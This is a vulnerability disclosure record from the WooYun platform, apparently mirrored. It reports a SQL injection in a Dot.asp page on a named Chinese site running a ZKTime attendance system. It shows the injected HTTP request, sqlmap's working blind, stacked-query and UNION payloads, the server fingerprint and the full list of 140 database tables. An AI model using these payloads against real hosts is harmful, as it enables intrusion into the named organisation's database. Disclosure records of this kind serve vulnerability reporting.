乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-23: 细节已通知厂商并且等待厂商处理中 2016-01-24: 厂商已经确认,细节仅向厂商公开 2016-02-03: 细节向核心白帽子及相关领域专家公开 2016-02-13: 细节向普通白帽子公开 2016-02-23: 细节向实习白帽子公开 2016-03-08: 细节向公众公开
GET /Dot.asp?Area=-1' OR 1=1* -- HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.gdsto.com.cn/Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIBHost: www.gdsto.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 -- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- -- Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -----web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2005Database: zktime_st[140 tables]+------------------------------+| acc_antiback || acc_device || acc_door || acc_firstopen || acc_firstopen_emp || acc_holidays || acc_interlock || acc_levelset || acc_levelset_door_group || acc_levelset_emp || acc_linkageio || acc_map || acc_mapdoorpos || acc_monitor_log || acc_morecardempgroup || acc_morecardgroup || acc_morecardset || acc_timeseg || acc_wiegandfmt || action_log || areaadmin || att_attreport || att_overtime || att_waitforprocessdata || attcalclog || attexception || attparam || attrecabnormite || attshifts || auth_group || auth_group_permissions || auth_message || auth_permission || auth_user || auth_user_groups || auth_user_user_permissions || base_additiondata || base_appoption || base_basecode || base_datatranslation || base_operatortemplate || base_option || base_personaloption || base_strresource || base_strtranslation || base_systemoption || checkexact || checkinout || dbapp_viewmodel || dbbackuplog || departments || deptadmin || devcmds || devcmds_bak || devlog || django_content_type || django_session || empitemdefine || facetemplate || holidays || iclock || iclock_dininghall || iclock_dstime || iclock_notice || iclock_oplog || iclock_testdata || iclock_testdata_admin_area || iclock_testdata_admin_dept || leaveclass || leaveclass1 || meeting_detailmeeting || meeting_leave || meeting_meetingemp || meeting_meetingentity || meeting_meetingexact || meeting_meetingreport || meeting_originalrecord || meeting_room || meeting_room_devices || meeting_statisticsmeeting || meeting_type || meeting_validrecord || num_run || num_run_deil || operatecmds || personnel_area || personnel_cardtype || personnel_cities || personnel_countries || personnel_education || personnel_empchange || personnel_iccard || personnel_iccard_posmeal || personnel_iccard_use_mechine || personnel_issuecard || personnel_leavelog || personnel_meal || personnel_national || personnel_positions || personnel_state || pos_allowance || pos_allowancesetting || pos_batchtime || pos_carcashsz || pos_carcashszbak || pos_carcashtype || pos_cardmanage || pos_cardserial || pos_errors || pos_handconsume || pos_icconsumerlist || pos_icconsumerlistbak || pos_keydetail || pos_keyvalue || pos_keyvalue_use_mechine || pos_loseunitecard || pos_merchandise || pos_posdevlog || pos_poslog || pos_replenishcard || pos_splittime || pos_splittime_use_mechine || pos_storedetail || pos_timebrush || pos_timedetail || pos_timeslice || posparam || schclass || setuseratt || template || user_of_run || user_speday || user_temp_sch || userinfo || userinfo_attarea || useruusedsclasses || worktable_groupmsg || worktable_instantmsg || worktable_msgtype || worktable_usrmsg |+------------------------------+
危害等级:中
漏洞Rank:5
确认时间:2016-01-24 13:51
谢谢
暂无